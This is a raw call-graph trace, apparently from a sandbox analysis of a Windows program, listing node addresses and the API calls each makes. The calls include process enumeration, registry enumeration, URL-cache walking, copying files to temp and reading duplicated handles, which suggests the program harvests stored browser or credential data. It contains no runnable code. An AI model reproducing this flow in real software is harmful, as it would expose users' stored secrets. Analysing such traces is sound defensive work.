38471->38472 38473 40b2cc 27 API calls 38472->38473 38474 4088fe 38473->38474 38475 409d1f 6 API calls 38474->38475 38476 40890e 38475->38476 38477 40b2cc 27 API calls 38476->38477 38478 40891d 38477->38478 38479 409d1f 6 API calls 38478->38479 38480 40892d 38479->38480 39129 409b98 GetFileAttributesW 38480->39129 38482 40893e 38483 408943 38482->38483 38484 408958 38482->38484 39130 407fdf 75 API calls 38483->39130 39131 409b98 GetFileAttributesW 38484->39131 38487 408964 38488 408969 38487->38488 38489 40897b 38487->38489 39132 4082c7 199 API calls 38488->39132 38506 40b633 ??3@YAXPAX 38505->38506 38507 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38506->38507 38508 413f00 Process32NextW 38507->38508 38509 413da5 OpenProcess 38508->38509 38510 413f17 CloseHandle 38508->38510 38511 413df3 memset 38509->38511 38515 413eb0 38509->38515 38510->38251 39431 413f27 38511->39431 38513 413ebf ??3@YAXPAX 38513->38515 38514 4099f4 3 API calls 38514->38515 38515->38508 38515->38513 38515->38514 38517 413e37 GetModuleHandleW 38518 413e46 GetProcAddress 38517->38518 38519 413e1f 38517->38519 38518->38519 38519->38517 39436 413959 38519->39436 39452 413ca4 38519->39452 38521 413ea2 CloseHandle 38521->38515 38523 414c2e 16 API calls 38522->38523 38524 403eb7 38523->38524 38525 414c2e 16 API calls 38524->38525 38526 403ec5 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 403ee2 38527->38528 38529 409d1f 6 API calls 38528->38529 38530 403efd 38529->38530 38531 409d1f 6 API calls 38530->38531 38532 403f15 38531->38532 38533 403af5 20 API calls 38532->38533 38534 403f29 38533->38534 38535 403af5 20 API calls 38534->38535 38536 403f3a 38535->38536 38537 40414f 33 API calls 38536->38537 38538 403f4f 38537->38538 38539 403faf 38538->38539 38541 403f5b memset 38538->38541 38543 4099c6 2 API calls 38538->38543 38544 40a8ab 9 API calls 38538->38544 39466 40b1ab ??3@YAXPAX ??3@YAXPAX 38539->39466 38541->38538 38542 403fb7 38542->38197 38543->38538 38544->38538 38546 414c2e 16 API calls 38545->38546 38547 403d26 38546->38547 38548 414c2e 16 API calls 38547->38548 38549 403d34 38548->38549 38550 409d1f 6 API calls 38549->38550 38551 403d51 38550->38551 38552 409d1f 6 API calls 38551->38552 38553 403d6c 38552->38553 38554 409d1f 6 API calls 38553->38554 38555 403d84 38554->38555 38556 403af5 20 API calls 38555->38556 38557 403d98 38556->38557 38558 403af5 20 API calls 38557->38558 38559 403da9 38558->38559 38560 40414f 33 API calls 38559->38560 38561 403dbe 38560->38561 38562 403e1e 38561->38562 38563 403dca memset 38561->38563 38566 4099c6 2 API calls 38561->38566 38567 40a8ab 9 API calls 38561->38567 39467 40b1ab ??3@YAXPAX ??3@YAXPAX 38562->39467 38563->38561 38565 403e26 38565->38201 38566->38561 38567->38561 38569 414b81 9 API calls 38568->38569 38570 414c40 38569->38570 38571 414c73 memset 38570->38571 39468 409cea 38570->39468 38573 414c94 38571->38573 39471 414592 RegOpenKeyExW 38573->39471 38575 414c64 38575->38192 38577 414cc1 38578 414cf4 wcscpy 38577->38578 39472 414bb0 wcscpy 38577->39472 38578->38575 38580 414cd2 39473 4145ac RegQueryValueExW 38580->39473 38582 414ce9 RegCloseKey 38582->38578 38584 409d62 38583->38584 38585 409d43 wcscpy 38583->38585 38584->38225 38586 409719 2 API calls 38585->38586 38587 409d51 wcscat 38586->38587 38587->38584 38589 40aebe FindClose 38588->38589 38590 40ae21 38589->38590 38591 4099c6 2 API calls 38590->38591 38592 40ae35 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 40ae49 38593->38594 38594->38268 38596 40ade0 38595->38596 38597 40ae0f 38595->38597 38596->38597 38598 40ade7 wcscmp 38596->38598 38597->38268 38598->38597 38599 40adfe wcscmp 38598->38599 38599->38597 38601 40ae18 9 API calls 38600->38601 38607 4453c4 38601->38607 38602 40ae51 9 API calls 38602->38607 38603 4453f3 38605 40aebe FindClose 38603->38605 38604 40add4 2 API calls 38604->38607 38606 4453fe 38605->38606 38606->38268 38607->38602 38607->38603 38607->38604 38608 445403 253 API calls 38607->38608 38608->38607 38610 40ae7b FindNextFileW 38609->38610 38611 40ae5c FindFirstFileW 38609->38611 38612 40ae94 38610->38612 38613 40ae8f 38610->38613 38611->38612 38615 40aeb6 38612->38615 38616 409d1f 6 API calls 38612->38616 38614 40aebe FindClose 38613->38614 38614->38612 38615->38268 38616->38615 38617->38200 38618->38254 38619->38235 38620->38235 38621->38269 38623 409c89 38622->38623 38623->38291 38624->38321 38626 413d39 38625->38626 38627 413d2f FreeLibrary 38625->38627 38628 40b633 ??3@YAXPAX 38626->38628 38627->38626 38629 413d42 38628->38629 38630 40b633 ??3@YAXPAX 38629->38630 38631 413d4a 38630->38631 38631->38149 38632->38152 38633->38203 38634->38217 38636 44db70 38635->38636 38637 40b6fc memset 38636->38637 38638 409c70 2 API calls 38637->38638 38639 40b732 wcsrchr 38638->38639 38640 40b743 38639->38640 38641 40b746 memset 38639->38641 38640->38641 38642 40b2cc 27 API calls 38641->38642 38643 40b76f 38642->38643 38644 409d1f 6 API calls 38643->38644 38645 40b783 38644->38645 39474 409b98 GetFileAttributesW 38645->39474 38647 40b792 38648 40b7c2 38647->38648 38649 409c70 2 API calls 38647->38649 39475 40bb98 38648->39475 38651 40b7a5 38649->38651 38653 40b2cc 27 API calls 38651->38653 38657 40b7b2 38653->38657 38654 40b837 FindCloseChangeNotification 38656 40b83e memset 38654->38656 38655 40b817 39509 409a45 GetTempPathW 38655->39509 39508 40a6e6 WideCharToMultiByte 38656->39508 38660 409d1f 6 API calls 38657->38660 38660->38648 38661 40b827 CopyFileW 38661->38656 38662 40b866 38663 444432 121 API calls 38662->38663 38664 40b879 38663->38664 38665 40bad5 38664->38665 38666 40b273 27 API calls 38664->38666 38667 40baeb 38665->38667 38668 40bade DeleteFileW 38665->38668 38669 40b89a 38666->38669 38670 40b04b ??3@YAXPAX 38667->38670 38668->38667 38671 438552 134 API calls 38669->38671 38672 40baf3 38670->38672 38673 40b8a4 38671->38673 38672->38228 38674 40bacd 38673->38674 38676 4251c4 137 API calls 38673->38676 38675 443d90 111 API calls 38674->38675 38675->38665 38699 40b8b8 38676->38699 38677 40bac6 39521 424f26 123 API calls 38677->39521 38678 40b8bd memset 39512 425413 17 API calls 38678->39512 38681 425413 17 API calls 38681->38699 38684 40a71b MultiByteToWideChar 38684->38699 38685 40a734 MultiByteToWideChar 38685->38699 38688 40b9b5 memcmp 38688->38699 38689 4099c6 2 API calls 38689->38699 38690 404423 37 API calls 38690->38699 38693 40bb3e memset memcpy 39522 40a734 MultiByteToWideChar 38693->39522 38694 4251c4 137 API calls 38694->38699 38696 40bb88 LocalFree 38696->38699 38699->38677 38699->38678 38699->38681 38699->38684 38699->38685 38699->38688 38699->38689 38699->38690 38699->38693 38699->38694 38700 40ba5f memcmp 38699->38700 39513 4253ef 16 API calls 38699->39513 39514 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38699->39514 39515 4253af 17 API calls 38699->39515 39516 4253cf 17 API calls 38699->39516 39517 447280 memset 38699->39517 39518 447960 memset memcpy memcpy memcpy 38699->39518 39519 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38699->39519 39520 447920 memcpy memcpy memcpy 38699->39520 38700->38699 38701->38230 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38162 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38213 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39618 409b98 GetFileAttributesW 38712->39618 38714 44545e 38715 445476 38714->38715 38716 40b6ef 252 API calls 38714->38716 38717 40b2cc 27 API calls 38715->38717 38716->38715 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39619 409b98 GetFileAttributesW 38720->39619 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 252 API calls 38722->38724 38723->38243 38724->38723 38725->38242 38726->38259 38727->38265 38728->38302 38729->38280 38730->38329 38731->38329 38732->38312 38733->38340 38734->38342 38735->38344 38737 414c2e 16 API calls 38736->38737 38738 40c2ae 38737->38738 38808 40c1d3 38738->38808 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38751 40a8ab 9 API calls 38749->38751 38750->38747 38752 40c373 GetLastError 38750->38752 38755 40c33e wcschr 38751->38755 38753 40c3ad FindCloseUrlCache 38752->38753 38754 40c37e 38752->38754 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38902 40a97a 38760->38902 38763 40a8cc 38763->38351 38764 40a8d0 7 API calls 38764->38763 38907 40b1ab ??3@YAXPAX ??3@YAXPAX 38765->38907 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 38908 414592 RegOpenKeyExW 38769->38908 38771 40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 38909 40aa1d 38775->38909 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 38911 405220 38787->38911 38791 4099c6 2 API calls 38790->38791 38792 40a714 _wcslwr 38791->38792 38793 40c634 38792->38793 38968 405361 38793->38968 38796 40c65c wcslen 38971 4053b6 39 API calls 38796->38971 38797 40c71d wcslen 38797->38358 38799 40c677 38800 40c713 38799->38800 38972 40538b 39 API calls 38799->38972 38974 4053df 39 API calls 38800->38974 38803 40c6a5 38803->38800 38804 40c6a9 memset 38803->38804 38805 40c6d3 38804->38805 38973 40c589 43 API calls 38805->38973 38807->38359 38809 40ae18 9 API calls 38808->38809 38815 40c210 38809->38815 38810 40ae51 9 API calls 38810->38815 38811 40c264 38812 40aebe FindClose 38811->38812 38814 40c26f 38812->38814 38813 40add4 2 API calls 38813->38815 38820 40e5ed memset memset 38814->38820 38815->38810 38815->38811 38815->38813 38816 40c231 _wcsicmp 38815->38816 38817 40c1d3 35 API calls 38815->38817 38816->38815 38818 40c248 38816->38818 38817->38815 38833 40c084 22 API calls 38818->38833 38821 414c2e 16 API calls 38820->38821 38822 40e63f 38821->38822 38823 409d1f 6 API calls 38822->38823 38824 40e658 38823->38824 38834 409b98 GetFileAttributesW 38824->38834 38826 40e667 38827 40e680 38826->38827 38828 409d1f 6 API calls 38826->38828 38835 409b98 GetFileAttributesW 38827->38835 38828->38827 38830 40e68f 38831 40c2d8 38830->38831 38836 40e4b2 38830->38836 38831->38743 38831->38744 38833->38815 38834->38826 38835->38830 38857 40e01e 38836->38857 38838 40e593 38840 40e5b0 38838->38840 38841 40e59c DeleteFileW 38838->38841 38839 40e521 38839->38838 38880 40e175 38839->38880 38842 40b04b ??3@YAXPAX 38840->38842 38841->38840 38843 40e5bb 38842->38843 38845 40e5c4 CloseHandle 38843->38845 38846 40e5cc 38843->38846 38845->38846 38848 40b633 ??3@YAXPAX 38846->38848 38847 40e573 38849 40e584 38847->38849 38850 40e57c FindCloseChangeNotification 38847->38850 38851 40e5db 38848->38851 38901 40b1ab ??3@YAXPAX ??3@YAXPAX 38849->38901 38850->38849 38854 40b633 ??3@YAXPAX 38851->38854 38853 40e540 38853->38847 38900 40e2ab 30 API calls 38853->38900 38855 40e5e3 38854->38855 38855->38831 38858 406214 22 API calls 38857->38858 38859 40e03c 38858->38859 38860 40e16b 38859->38860 38861 40dd85 74 API calls 38859->38861 38860->38839 38862 40e06b 38861->38862 38862->38860 38863 40afcf ??2@YAPAXI ??3@YAXPAX 38862->38863 38864 40e08d OpenProcess 38863->38864 38865 40e0a4 GetCurrentProcess DuplicateHandle 38864->38865 38869 40e152 38864->38869 38866 40e0d0 GetFileSize 38865->38866 38867 40e14a CloseHandle 38865->38867 38870 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38866->38870 38867->38869 38868 40e160 38872 40b04b ??3@YAXPAX 38868->38872 38869->38868 38871 406214 22 API calls 38869->38871 38873 40e0ea 38870->38873 38871->38868 38872->38860 38874 4096dc CreateFileW 38873->38874 38875 40e0f1 CreateFileMappingW 38874->38875 38876 40e140 CloseHandle CloseHandle 38875->38876 38877 40e10b MapViewOfFile 38875->38877 38876->38867 38878 40e13b FindCloseChangeNotification 38877->38878 38879 40e11f WriteFile UnmapViewOfFile 38877->38879 38878->38876 38879->38878 38881 40e18c 38880->38881 38882 406b90 11 API calls 38881->38882 38883 40e19f 38882->38883 38884 40e1a7 memset 38883->38884 38885 40e299 38883->38885 38890 40e1e8 38884->38890 38886 4069a3 ??3@YAXPAX ??3@YAXPAX 38885->38886 38887 40e2a4 38886->38887 38887->38853 38888 406e8f 13 API calls 38888->38890 38889 406b53 SetFilePointerEx ReadFile 38889->38890 38890->38888 38890->38889 38891 40e283 38890->38891 38892 40dd50 _wcsicmp 38890->38892 38896 40742e 8 API calls 38890->38896 38897 40aae3 wcslen wcslen _memicmp 38890->38897 38898 40e244 _snwprintf 38890->38898 38893 40e291 38891->38893 38894 40e288 ??3@YAXPAX 38891->38894 38892->38890 38895 40aa04 ??3@YAXPAX 38893->38895 38894->38893 38895->38885 38896->38890 38897->38890 38899 40a8d0 7 API calls 38898->38899 38899->38890 38900->38853 38901->38838 38904 40a980 38902->38904 38903 40a8bb 38903->38763 38903->38764 38904->38903 38905 40a995 _wcsicmp 38904->38905 38906 40a99c wcscmp 38904->38906 38905->38904 38906->38904 38907->38767 38908->38771 38910 40aa23 RegEnumValueW 38909->38910 38910->38778 38910->38779 38912 405335 38911->38912 38913 40522a 38911->38913 38912->38358 38914 40b2cc 27 API calls 38913->38914 38915 405234 38914->38915 38916 40a804 8 API calls 38915->38916 38917 40523a 38916->38917 38956 40b273 38917->38956 38919 405248 _mbscpy _mbscat GetProcAddress 38920 40b273 27 API calls 38919->38920 38921 405279 38920->38921 38959 405211 GetProcAddress 38921->38959 38923 405282 38924 40b273 27 API calls 38923->38924 38925 40528f 38924->38925 38960 405211 GetProcAddress 38925->38960 38927 405298 38928 40b273 27 API calls 38927->38928 38929 4052a5 38928->38929 38961 405211 GetProcAddress 38929->38961 38931 4052ae 38932 40b273 27 API calls 38931->38932 38933 4052bb 38932->38933 38962 405211 GetProcAddress 38933->38962 38935 4052c4 38936 40b273 27 API calls 38935->38936 38937 4052d1 38936->38937 38963 405211 GetProcAddress 38937->38963 38939 4052da 38940 40b273 27 API calls 38939->38940 38941 4052e7 38940->38941 38964 405211 GetProcAddress 38941->38964 38943 4052f0 38944 40b273 27 API calls 38943->38944 38945 4052fd 38944->38945 38965 405211 GetProcAddress 38945->38965 38947 405306 38948 40b273 27 API calls 38947->38948 38949 405313 38948->38949 38966 405211 GetProcAddress 38949->38966 38951 40531c 38952 40b273 27 API calls 38951->38952 38953 405329 38952->38953 38967 405211 GetProcAddress 38953->38967 38955 405332 38955->38912 38957 40b58d 27 API calls 38956->38957 38958 40b18c 38957->38958 38958->38919 38959->38923 38960->38927 38961->38931 38962->38935 38963->38939 38964->38943 38965->38947 38966->38951 38967->38955 38969 405220 39 API calls 38968->38969 38970 405369 38969->38970 38970->38796 38970->38797 38971->38799 38972->38803 38973->38800 38974->38797 38976 40440c FreeLibrary 38975->38976 38977 40436d 38976->38977 38978 40a804 8 API calls 38977->38978 38979 404377 38978->38979 38980 404383 38979->38980 38981 404405 38979->38981 38982 40b273 27 API calls 38980->38982 38981->38370 38981->38372 38981->38373 38983 40438d GetProcAddress 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043a7 GetProcAddress 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043ba GetProcAddress 38986->38987 38988 40b273 27 API calls 38987->38988 38989 4043ce GetProcAddress 38988->38989 38990 40b273 27 API calls 38989->38990 38991 4043e2 GetProcAddress 38990->38991 38992 4043f1 38991->38992 38993 4043f7 38992->38993 38994 40440c FreeLibrary 38992->38994 38993->38981 38994->38981 38996 404413 FreeLibrary 38995->38996 38997 40441e 38995->38997 38996->38997 38997->38387 38998->38378 39000 40442e 38999->39000 39001 40447e 38999->39001 39002 40b2cc 27 API calls 39000->39002 39001->38378 39003 404438 39002->39003 39004 40a804 8 API calls 39003->39004 39005 40443e 39004->39005 39006 404445 39005->39006 39007 404467 39005->39007 39008 40b273 27 API calls 39006->39008 39007->39001 39009 404475 FreeLibrary 39007->39009 39010 40444f GetProcAddress 39008->39010 39009->39001 39010->39007 39011 404460 39010->39011 39011->39007 39013 4135f6 39012->39013 39014 4135eb FreeLibrary 39012->39014 39013->38390 39014->39013 39016 4449c4 39015->39016 39017 444a52 39015->39017 39018 40b2cc 27 API calls 39016->39018 39017->38407 39017->38408 39019 4449cb 39018->39019 39020 40a804 8 API calls 39019->39020 39021 4449d1 39020->39021 39022 40b273 27 API calls 39021->39022 39023 4449dc GetProcAddress 39022->39023 39024 40b273 27 API calls 39023->39024 39025 4449f3 GetProcAddress 39024->39025 39026 40b273 27 API calls 39025->39026 39027 444a04 GetProcAddress 39026->39027 39028 40b273 27 API calls 39027->39028 39029 444a15 GetProcAddress 39028->39029 39030 40b273 27 API calls 39029->39030 39031 444a26 GetProcAddress 39030->39031 39032 40b273 27 API calls 39031->39032 39033 444a37 GetProcAddress 39032->39033 39034 40b273 27 API calls 39033->39034 39035 444a48 GetProcAddress 39034->39035 39035->39017 39036->38418 39037->38418 39038->38418 39039->38418 39040->38409 39042 403a29 39041->39042 39056 403bed memset memset 39042->39056 39044 403ae7 39069 40b1ab ??3@YAXPAX ??3@YAXPAX 39044->39069 39045 403a3f memset 39051 403a2f 39045->39051 39047 403aef 39047->38426 39048 409b98 GetFileAttributesW 39048->39051 39049 40a8d0 7 API calls 39049->39051 39050 409d1f 6 API calls 39050->39051 39051->39044 39051->39045 39051->39048 39051->39049 39051->39050 39053 40a051 GetFileTime FindCloseChangeNotification 39052->39053 39054 4039ca CompareFileTime 39052->39054 39053->39054 39054->38426 39055->38425 39057 414c2e 16 API calls 39056->39057 39058 403c38 39057->39058 39059 409719 2 API calls 39058->39059 39060 403c3f wcscat 39059->39060 39061 414c2e 16 API calls 39060->39061 39062 403c61 39061->39062 39063 409719 2 API calls 39062->39063 39064 403c68 wcscat 39063->39064 39070 403af5 39064->39070 39067 403af5 20 API calls 39068 403c95 39067->39068 39068->39051 39069->39047 39071 403b02 39070->39071 39072 40ae18 9 API calls 39071->39072 39080 403b37 39072->39080 39073 403bdb 39075 40aebe FindClose 39073->39075 39074 40add4 wcscmp wcscmp 39074->39080 39076 403be6 39075->39076 39076->39067 39077 40ae18 9 API calls 39077->39080 39078 40ae51 9 API calls 39078->39080 39079 40aebe FindClose 39079->39080 39080->39073 39080->39074 39080->39077 39080->39078 39080->39079 39081 40a8d0 7 API calls 39080->39081 39081->39080 39083 409d1f 6 API calls 39082->39083 39084 404190 39083->39084 39097 409b98 GetFileAttributesW 39084->39097 39086 40419c 39087 4041a7 6 API calls 39086->39087 39088 40435c 39086->39088 39090 40424f 39087->39090 39088->38452 39090->39088 39091 40425e memset 39090->39091 39093 409d1f 6 API calls 39090->39093 39094 40a8ab 9 API calls 39090->39094 39098 414842 39090->39098 39091->39090 39092 404296 wcscpy 39091->39092 39092->39090 39093->39090 39095 4042b6 memset memset _snwprintf wcscpy 39094->39095 39095->39090 39096->38450 39097->39086 39101 41443e 39098->39101 39100 414866 39100->39090 39102 41444b 39101->39102 39103 414451 39102->39103 39104 4144a3 GetPrivateProfileStringW 39102->39104 39105 414491 39103->39105 39106 414455 wcschr 39103->39106 39104->39100 39108 414495 WritePrivateProfileStringW 39105->39108 39106->39105 39107 414463 _snwprintf 39106->39107 39107->39108 39108->39100 39109->38456 39111 40b2cc 27 API calls 39110->39111 39112 409615 39111->39112 39113 409d1f 6 API calls 39112->39113 39114 409625 39113->39114 39139 409b98 GetFileAttributesW 39114->39139 39116 409634 39117 409648 39116->39117 39140 4091b8 memset 39116->39140 39119 40b2cc 27 API calls 39117->39119 39121 408801 39117->39121 39120 40965d 39119->39120 39122 409d1f 6 API calls 39120->39122 39121->38459 39121->38460 39123 40966d 39122->39123 39192 409b98 GetFileAttributesW 39123->39192 39125 40967c 39125->39121 39126 409681 39125->39126 39193 409529 72 API calls 39126->39193 39128 409690 39128->39121 39129->38482 39130->38459 39131->38487 39132->38459 39139->39116 39194 40a6e6 WideCharToMultiByte 39140->39194 39142 409202 39195 444432 39142->39195 39145 40b273 27 API calls 39146 409236 39145->39146 39241 438552 39146->39241 39149 409383 39151 40b273 27 API calls 39149->39151 39153 409399 39151->39153 39152 409254 39154 40937b 39152->39154 39262 4253cf 17 API calls 39152->39262 39155 438552 134 API calls 39153->39155 39266 424f26 123 API calls 39154->39266 39173 4093a3 39155->39173 39159 4094ff 39270 443d90 39159->39270 39162 4251c4 137 API calls 39162->39173 39164 409507 39172 40951d 39164->39172 39290 408f2f 77 API calls 39164->39290 39166 4093df 39269 424f26 123 API calls 39166->39269 39170 4253cf 17 API calls 39170->39173 39172->39117 39173->39159 39173->39162 39173->39166 39173->39170 39175 4093e4 39173->39175 39267 4253af 17 API calls 39175->39267 39182 4093ed 39268 4253af 17 API calls 39182->39268 39185 4093f9 39185->39166 39186 409409 memcmp 39185->39186 39186->39166 39187 409421 memcmp 39186->39187 39192->39125 39193->39128 39194->39142 39291 4438b5 39195->39291 39197 44444c 39203 409215 39197->39203 39305 415a6d 39197->39305 39199 4442e6 11 API calls 39201 44469e 39199->39201 39200 444486 39202 4444b9 memcpy 39200->39202 39240 4444a4 39200->39240 39201->39203 39205 443d90 111 API calls 39201->39205 39309 415258 39202->39309 39203->39145 39203->39172 39205->39203 39206 444524 39207 444541 39206->39207 39208 44452a 39206->39208 39312 444316 39207->39312 39209 416935 16 API calls 39208->39209 39209->39240 39212 444316 18 API calls 39213 444563 39212->39213 39214 444316 18 API calls 39213->39214 39215 44456f 39214->39215 39216 444316 18 API calls 39215->39216 39217 44457f 39216->39217 39217->39240 39326 432d4e 39217->39326 39240->39199 39379 438460 39241->39379 39243 409240 39243->39149 39244 4251c4 39243->39244 39391 424f07 39244->39391 39246 4251e4 39247 4251f7 39246->39247 39248 4251e8 39246->39248 39399 4250f8 39247->39399 39398 4446ea 11 API calls 39248->39398 39250 4251f2 39250->39152 39252 425209 39255 425249 39252->39255 39258 4250f8 127 API calls 39252->39258 39259 425287 39252->39259 39407 4384e9 135 API calls 39252->39407 39408 424f74 124 API calls 39252->39408 39255->39259 39258->39252 39266->39149 39267->39182 39268->39185 39269->39159 39271 443da3 39270->39271 39272 443db6 39270->39272 39415 41707a 39271->39415 39272->39164 39274 443da8 39290->39172 39292 4438d0 39291->39292 39302 4438c9 39291->39302 39293 415378 memcpy memcpy 39292->39293 39294 4438d5 39293->39294 39295 4154e2 10 API calls 39294->39295 39296 443906 39294->39296 39294->39302 39295->39296 39297 443970 memset 39296->39297 39296->39302 39300 44398b 39297->39300 39298 4439a0 39299 415700 10 API calls 39298->39299 39298->39302 39303 4439c0 39299->39303 39300->39298 39301 41975c 10 API calls 39300->39301 39301->39298 39302->39197 39303->39302 39304 418981 10 API calls 39303->39304 39304->39302 39306 415a77 39305->39306 39307 415a8d 39306->39307 39308 415a7e memset 39306->39308 39307->39200 39308->39307 39310 4438b5 11 API calls 39309->39310 39311 41525d 39310->39311 39311->39206 39313 444328 39312->39313 39314 444423 39313->39314 39315 44434e 39313->39315 39316 4446ea 11 API calls 39314->39316 39317 432d4e memset memset memcpy 39315->39317 39323 444381 39316->39323 39318 44435a 39317->39318 39320 444375 39318->39320 39325 44438b 39318->39325 39319 432d4e memset memset memcpy 39321 4443ec 39319->39321 39322 416935 16 API calls 39320->39322 39321->39323 39324 416935 16 API calls 39321->39324 39322->39323 39323->39212 39324->39323 39325->39319 39380 41703f 11 API calls 39379->39380 39381 43847a 39380->39381 39382 43848a 39381->39382 39383 43847e 39381->39383 39385 438270 134 API calls 39382->39385 39384 4446ea 11 API calls 39383->39384 39387 438488 39384->39387 39386 4384aa 39385->39386 39386->39387 39388 424f26 123 API calls 39386->39388 39387->39243 39389 4384bb 39388->39389 39390 438270 134 API calls 39389->39390 39390->39387 39392 424f1f 39391->39392 39393 424f0c 39391->39393 39395 424eea 11 API calls 39392->39395 39394 416760 11 API calls 39393->39394 39396 424f18 39394->39396 39397 424f24 39395->39397 39396->39246 39397->39246 39398->39250 39400 425108 39399->39400 39406 42510d 39399->39406 39401 424f74 124 API calls 39400->39401 39401->39406 39402 42569b 125 API calls 39403 42516e 39402->39403 39404 425115 39404->39252 39406->39402 39406->39404 39407->39252 39408->39252 39416 417085 39415->39416 39417 4170ab 39415->39417 39416->39417 39418 416760 11 API calls 39416->39418 39417->39274 39458 413f4f 39431->39458 39434 413f37 K32GetModuleFileNameExW 39435 413f4a 39434->39435 39435->38519 39437 413969 wcscpy 39436->39437 39438 41396c wcschr 39436->39438 39450 413a3a 39437->39450 39438->39437 39440 41398e 39438->39440 39463 4097f7 wcslen wcslen _memicmp 39440->39463 39442 41399a 39443 4139a4 memset 39442->39443 39444 4139e6 39442->39444 39464 409dd5 GetWindowsDirectoryW wcscpy 39443->39464 39446 413a31 wcscpy 39444->39446 39447 4139ec memset 39444->39447 39446->39450 39465 409dd5 GetWindowsDirectoryW wcscpy 39447->39465 39448 4139c9 wcscpy wcscat 39448->39450 39450->38519 39451 413a11 memcpy wcscat 39451->39450 39453 413cb0 GetModuleHandleW 39452->39453 39454 413cda 39452->39454 39453->39454 39455 413cbf GetProcAddress 39453->39455 39456 413ce3 GetProcessTimes 39454->39456 39457 413cf6 39454->39457 39455->39454 39456->38521 39457->38521 39459 413f2f 39458->39459 39460 413f54 39458->39460 39459->39434 39459->39435 39461 40a804 8 API calls 39460->39461 39462 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39461->39462 39462->39459 39463->39442 39464->39448 39465->39451 39466->38542 39467->38565 39469 409cf9 GetVersionExW 39468->39469 39470 409d0a 39468->39470 39469->39470 39470->38571 39470->38575 39471->38577 39472->38580 39473->38582 39474->38647 39476 40bba5 39475->39476 39523 40cc26 39476->39523 39479 40bd4b 39551 40cc0c 39479->39551 39484 40b2cc 27 API calls 39485 40bbef 39484->39485 39544 40ccf0 39485->39544 39487 40bbf5 39487->39479 39548 40ccb4 39487->39548 39490 40cf04 17 API calls 39491 40bc2e 39490->39491 39492 40bd43 39491->39492 39493 40b2cc 27 API calls 39491->39493 39494 40cc0c 4 API calls 39492->39494 39495 40bc40 39493->39495 39494->39479 39496 40ccf0 _wcsicmp 39495->39496 39497 40bc46 39496->39497 39497->39492 39498 40bc61 memset memset WideCharToMultiByte 39497->39498 39558 40103c strlen 39498->39558 39500 40bcc0 39501 40b273 27 API calls 39500->39501 39502 40bcd0 memcmp 39501->39502 39502->39492 39503 40bce2 39502->39503 39504 404423 37 API calls 39503->39504 39505 40bd10 39504->39505 39505->39492 39506 40bd3a LocalFree 39505->39506 39507 40bd1f memcpy 39505->39507 39506->39492 39507->39506 39508->38662 39510 409a74 GetTempFileNameW 39509->39510 39511 409a66 GetWindowsDirectoryW 39509->39511 39510->38661 39511->39510 39512->38699 39513->38699 39514->38699 39515->38699 39516->38699 39517->38699 39518->38699 39519->38699 39520->38699 39521->38674 39522->38696 39559 4096c3 CreateFileW 39523->39559 39525 40cc34 39526 40cc3d GetFileSize 39525->39526 39534 40bbca 39525->39534 39527 40afcf 2 API calls 39526->39527 39528 40cc64 39527->39528 39560 40a2ef ReadFile 39528->39560 39530 40cc71 39561 40ab4a MultiByteToWideChar 39530->39561 39532 40cc95 FindCloseChangeNotification 39533 40b04b ??3@YAXPAX 39532->39533 39533->39534 39534->39479 39535 40cf04 39534->39535 39536 40b633 ??3@YAXPAX 39535->39536 39537 40cf14 39536->39537 39567 40b1ab ??3@YAXPAX ??3@YAXPAX 39537->39567 39539 40bbdd 39539->39479 39539->39484 39540 40cf1b 39540->39539 39542 40cfef 39540->39542 39568 40cd4b 39540->39568 39543 40cd4b 14 API calls 39542->39543 39543->39539 39545 40ccfd 39544->39545 39547 40cd3f 39544->39547 39546 40cd26 _wcsicmp 39545->39546 39545->39547 39546->39545 39546->39547 39547->39487 39549 40aa29 6 API calls 39548->39549 39550 40bc26 39549->39550 39550->39490 39552 40b633 ??3@YAXPAX 39551->39552 39553 40cc15 39552->39553 39554 40aa04 ??3@YAXPAX 39553->39554 39555 40cc1d 39554->39555 39617 40b1ab ??3@YAXPAX ??3@YAXPAX 39555->39617 39557 40b7d4 memset CreateFileW 39557->38654 39557->38655 39558->39500 39559->39525 39560->39530 39562 40ab6b 39561->39562 39566 40ab93 39561->39566 39563 40a9ce 4 API calls 39562->39563 39564 40ab74 39563->39564 39565 40ab7c MultiByteToWideChar 39564->39565 39565->39566 39566->39532 39567->39540 39569 40cd7b 39568->39569 39602 40aa29 39569->39602 39571 40cef5 39572 40aa04 ??3@YAXPAX 39571->39572 39573 40cefd 39572->39573 39573->39540 39575 40aa29 6 API calls 39576 40ce1d 39575->39576 39577 40aa29 6 API calls 